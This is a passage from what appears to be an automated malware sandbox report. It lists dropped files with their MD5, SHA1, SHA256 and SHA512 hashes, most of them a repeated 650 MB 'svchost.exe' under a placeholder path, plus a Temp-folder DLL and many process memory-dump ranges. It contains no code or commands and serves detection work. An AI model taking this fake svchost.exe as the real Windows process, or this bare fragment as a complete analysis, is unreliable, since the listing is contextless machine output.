                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.exe
                                                        Filesize

                                                        650.0MB

                                                        MD5

                                                        a631c4a140297aef2751250a84e2389c

                                                        SHA1

                                                        641a34a36fcdad2604644c4e808d81ae1cadd857

                                                        SHA256

                                                        44142e04d55c45f7c2edd3ac29a7b89bbd68355052fffaf12b73249c955ec524

                                                        SHA512

                                                        7e2303873c288008cae859ad23d24e88c8796a696ecea9c6368fe13f26bc54fbf2c121a40146eda5e25f1adae09a9953d0e968bc657621c6b53d6373dc5262f6

                                                      • C:\path\to\destination\svchost.zip
                                                        MD5

                                                        d41d8cd98f00b204e9800998ecf8427e

                                                        SHA1

                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                        SHA256

                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                        SHA512

                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                      • \Users\Admin\AppData\Local\Temp\XenManager.dll
                                                        Filesize

                                                        2.0MB

                                                        MD5

                                                        7a5c53a889c4bf3f773f90b85af5449e

                                                        SHA1

                                                        25b2928c310b3068b629e9dca38c7f10f6adc5b6

                                                        SHA256

                                                        baa9c3a0d0524263c4f848056b3f1da3b4bb913162362cbcabe77ce76a39870c

                                                        SHA512

                                                        f5943687d7e098790581bf56ac6fec3b7e9b83d0e29301077a8bc48768c5a0e9f54f53d926f9847885f6035a2b31e456e4e45ccf1c70be27229c46e79876e2ed

                                                      • memory/908-289-0x000000001B990000-0x000000001B9A0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/908-288-0x000000001B990000-0x000000001B9A0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/908-272-0x000000001B990000-0x000000001B9A0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/908-504-0x000000001B990000-0x000000001B9A0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/908-466-0x000000001B990000-0x000000001B9A0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/908-439-0x000000001B990000-0x000000001B9A0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/908-368-0x000000001E280000-0x000000001E36D000-memory.dmp
                                                        Filesize

                                                        948KB

                                                      • memory/916-335-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-301-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-306-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-344-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-350-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-290-0x0000000001430000-0x0000000001496000-memory.dmp
                                                        Filesize

                                                        408KB

                                                      • memory/916-352-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-303-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-354-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-356-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-358-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-360-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-362-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-364-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-366-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-329-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-369-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-338-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-372-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-374-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-376-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-323-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-299-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-297-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-321-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-319-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-317-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-544-0x000000001C200000-0x000000001C300000-memory.dmp
                                                        Filesize

                                                        1024KB

                                                      • memory/916-315-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-294-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-313-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-287-0x0000000000BB0000-0x0000000000EB8000-memory.dmp
                                                        Filesize

                                                        3.0MB

                                                      • memory/916-292-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-310-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/916-309-0x000000001C200000-0x000000001C300000-memory.dmp
                                                        Filesize

                                                        1024KB

                                                      • memory/916-291-0x0000000001430000-0x0000000001490000-memory.dmp
                                                        Filesize

                                                        384KB

                                                      • memory/1388-2245-0x000000001C100000-0x000000001C200000-memory.dmp
                                                        Filesize

                                                        1024KB

                                                      • memory/1416-169-0x00000000097D0000-0x0000000009CCE000-memory.dmp
                                                        Filesize

                                                        5.0MB

                                                      • memory/1416-168-0x0000000009190000-0x00000000091B2000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/1416-174-0x0000000006C20000-0x0000000006C30000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1416-167-0x0000000009230000-0x00000000092C4000-memory.dmp
                                                        Filesize

                                                        592KB

                                                      • memory/1416-215-0x0000000006C20000-0x0000000006C30000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1416-151-0x0000000006C20000-0x0000000006C30000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1416-216-0x0000000006C20000-0x0000000006C30000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1416-152-0x0000000006C20000-0x0000000006C30000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1416-218-0x0000000006C20000-0x0000000006C30000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/3652-192-0x0000000000F30000-0x0000000000F66000-memory.dmp
                                                        Filesize

                                                        216KB

                                                      • memory/3652-214-0x000000001BC30000-0x000000001BC40000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/3652-217-0x000000001BC30000-0x000000001BC40000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/3652-202-0x000000001D760000-0x000000001D7D6000-memory.dmp
                                                        Filesize

                                                        472KB

                                                      • memory/3652-193-0x0000000001490000-0x00000000014AA000-memory.dmp
                                                        Filesize

                                                        104KB

                                                      • memory/3652-194-0x000000001C070000-0x000000001C0A8000-memory.dmp
                                                        Filesize

                                                        224KB

                                                      • memory/3652-200-0x000000001CCE0000-0x000000001CD02000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/3652-201-0x000000001BC30000-0x000000001BC40000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4176-1723-0x00000000003D0000-0x00000000003E0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4176-1797-0x00000000059B0000-0x0000000005A42000-memory.dmp
                                                        Filesize

                                                        584KB

                                                      • memory/4176-2582-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4176-1729-0x0000000004A30000-0x0000000004ACC000-memory.dmp
                                                        Filesize

                                                        624KB

                                                      • memory/4176-1753-0x0000000004BC0000-0x0000000004BD0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4384-146-0x00000000091B0000-0x00000000091CA000-memory.dmp
                                                        Filesize

                                                        104KB

                                                      • memory/4384-148-0x000000000AA60000-0x000000000B206000-memory.dmp
                                                        Filesize

                                                        7.6MB

                                                      • memory/4384-121-0x0000000007490000-0x0000000007AB8000-memory.dmp
                                                        Filesize

                                                        6.2MB

                                                      • memory/4384-122-0x0000000007320000-0x0000000007342000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/4384-123-0x0000000007C10000-0x0000000007C76000-memory.dmp
                                                        Filesize

                                                        408KB

                                                      • memory/4384-124-0x0000000007B30000-0x0000000007B96000-memory.dmp
                                                        Filesize

                                                        408KB

                                                      • memory/4384-126-0x0000000006E50000-0x0000000006E60000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4384-176-0x0000000006E50000-0x0000000006E60000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4384-175-0x0000000006E50000-0x0000000006E60000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4384-125-0x0000000006E50000-0x0000000006E60000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4384-127-0x0000000007D20000-0x0000000008070000-memory.dmp
                                                        Filesize

                                                        3.3MB

                                                      • memory/4384-120-0x0000000006D70000-0x0000000006DA6000-memory.dmp
                                                        Filesize

                                                        216KB

                                                      • memory/4384-128-0x0000000007BE0000-0x0000000007BFC000-memory.dmp
                                                        Filesize

                                                        112KB

                                                      • memory/4384-129-0x0000000008150000-0x000000000819B000-memory.dmp
                                                        Filesize

                                                        300KB

                                                      • memory/4384-130-0x0000000008460000-0x00000000084D6000-memory.dmp
                                                        Filesize

                                                        472KB

                                                      • memory/4384-212-0x0000000006E50000-0x0000000006E60000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4384-147-0x0000000006E50000-0x0000000006E60000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4384-145-0x0000000009C30000-0x000000000A2A8000-memory.dmp
                                                        Filesize

                                                        6.5MB

                                                      • memory/4568-841-0x000000001BF00000-0x000000001C000000-memory.dmp
                                                        Filesize

                                                        1024KB

                                                      • memory/4568-470-0x000000001BF00000-0x000000001C000000-memory.dmp
                                                        Filesize

                                                        1024KB

                                                      • memory/5112-311-0x0000000000AE0000-0x0000000000AF0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/5112-268-0x000000001E300000-0x000000001E3ED000-memory.dmp
                                                        Filesize

                                                        948KB

                                                      • memory/5112-252-0x000000001C190000-0x000000001C19A000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/5112-305-0x0000000000AE0000-0x0000000000AF0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/5112-307-0x0000000000AE0000-0x0000000000AF0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/5112-271-0x0000000000AE0000-0x0000000000AF0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/5112-251-0x000000001E5F0000-0x000000001E602000-memory.dmp
                                                        Filesize

                                                        72KB

                                                      • memory/5112-249-0x0000000000AE0000-0x0000000000AF0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/5112-248-0x0000000000AE0000-0x0000000000AF0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/5112-247-0x000000001CA60000-0x000000001CA7C000-memory.dmp
                                                        Filesize

                                                        112KB

                                                      • memory/5112-246-0x000000001C0D0000-0x000000001C0DA000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/5112-228-0x0000000000AE0000-0x0000000000AF0000-memory.dmp
                                                        Filesize

                                                        64KB